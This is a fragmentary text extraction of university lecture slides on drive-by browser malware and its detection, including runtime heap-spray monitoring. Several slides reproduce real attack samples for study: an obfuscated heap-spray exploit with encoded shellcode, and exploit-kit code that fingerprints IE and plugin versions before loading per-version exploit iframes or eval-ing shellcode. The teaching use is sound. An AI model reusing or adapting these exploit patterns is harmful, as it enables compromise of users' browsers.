CSE484/CSE584 DRIVE-BY MALWARE Dr. Benjamin Livshits Homework, - - PowerPoint PPT Presentation
CSE484/CSE584 DRIVE-BY MALWARE Dr. Benjamin Livshits Homework, Labs, and Project 2 Please be ready to give HW-3 due Friday a short 2-minute pitch Lab-3 due Tuesday about your strategy We want to give you Ask more questions
Please be ready to give
We want to give you
sql3 xss7 Xss8
Are now extra credit
2
HW-3 due Friday Lab-3 due Tuesday Ask more questions We are here to help There’s no need to feel
var MuqEZYdx = "%u56e8%u0000%u5300%u5655%u8b57%u246c%u8b18%u3c45%u548b%u7805%uea01…“ ; var avIztsbF = "%u0C0C%u0C0C"; var TzsygYnD = "%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA"; var eSSOLKOd = unescape(MuqEZYdx); var pbIkPrKa = new Array(); var wSqaQK = 1000; var xASdnqwj = 0x100000; var xAFKNqwO = 2; var oQkmsLLP = 0x01020; var EibcUrHC = xASdnqwj - (eSSOLKOd.length * xAFKNqwO + oQkmsLLP); var cTAfWBbz = unescape(avIztsbF); var oKqMlPqL = 0xC0;
while (cTAfWBbz.length < EibcUrHC / xAFKNqwO) {
cTAfWBbz += cTAfWBbz; } var GBVpRAcd = cTAfWBbz.substring(0, EibcUrHC / xAFKNqwO);
delete cTAfWBbz; for (JyxIaABZ = 0; JyxIaABZ < oKqMlPqL; JyxIaABZ++) { pbIkPrKa[JyxIaABZ] = GBVpRAcd + eSSOLKOd; } CollectGarbage();
var fseYOuUZ = unescape(TzsygYnD); var wxDSxsOR = new Array();
for (var FNMszcqR = 0; FNMszcqR < wSqaQK; FNMszcqR++) wxDSxsOR.push(document.createElement("img"));
function FKOASMamskASDweqnbjdwasSDQWWQq() { vVLUmYRf = document.createElement("tbody"); vVLUmYRf.click; var wycLwNIo = vVLUmYRf.cloneNode();
3
VM-based detection Static or statistical
Runtime observations Done in data centers
Generally, pre-
Why? What are the
4
5
6
7
Runtime detection
Put a (possibly
Equip it with some
Visit a possibly
See if anything
Why use a VM? What if nothing
How would malware
8
Focusing on heap
Monitor the browser
9
Observe patterns in
Train Machine
Combine with de-
10
11
if (navigator.userAgent.toLowerCase().indexOf( "\x6D"+"\x73\x69\x65"+"\x20\x36")>0) document.write("<iframe src=x6.htm></iframe>"); if (navigator.userAgent.toLowerCase().indexOf( "\x6D"+"\x73"+"\x69"+"\x65"+"\x20"+"\x37")>0) document.write("<iframe src=x7.htm></iframe>"); try { var a; var aa=new ActiveXObject("Sh"+"ockw"+"av"+"e"+"Fl"+[…]); } catch(a) { } finally { if (a!="[object Error]") document.write("<iframe src=svfl9.htm></iframe>"); } try { var c; var f=new ActiveXObject("O"+"\x57\x43"+"\x31\x30\x2E\x53"+[…]); } catch(c) { } finally { if (c!="[object Error]") { aacc = "<iframe src=of.htm></iframe>"; setTimeout("document.write(aacc)", 3500); } }
Online
… an example pulled from our DB… "\x6D"+"\x73\x69\x65 "+"\x20\x36" = "msie 6" "\x6D"+"\x73"+"\x69"+"\ x65"+"\x20"+"\x37" = "msie 7" "O"+"\x57\x43"+"\x31\x30\x2E\x5 3"+"pr"+"ea"+"ds"+"he"+"et" = "OWC10.Spreadsheet"
12
Nozzle Zozzle
<script> if (navigator.userAgent.indexOf(‘IE 6’)>=0) { var x=unescape(‘%u4149%u1982%u90 […]’); eval(x); } </script>
13
<script> var adobe=new ActiveXObject(‘AcroPDF.PDF’); var adobeVersion=adobe.GetVariable (‘$version’); if (navigator.userAgent.indexOf(‘IE 6’)>=0 && adobeVersion == ’9.1.3’) { var x=unescape(‘%u4149%u1982%u90 […]’); eval(x); } </script>
14
15
16
17
1.4 1.5 2.0 9.0 9.1 10.0 8 9 10
… …
Clearly does not scale How many resources should be allocated to filter malicious sites? What if the site simply is not malicious?
18
What it is/does
What it is not
19
<script> var adobe=new ActiveXObject(‘AcroPDF.PDF’); var adobeVersion=adobe.GetVariable (‘$version’); if (navigator.userAgent.indexOf(‘IE 7’)>=0 && adobeVersion == ’9.1.3’) { var x=unescape(‘%u4149%u1982%u90 […]’); eval(x); } else if (adobeVersion == ’8.0.1’) { var x=unescape(‘%u4073%u8279%u77 […]’); eval(x); } … </script>
20
Offline
Online
Overhead
21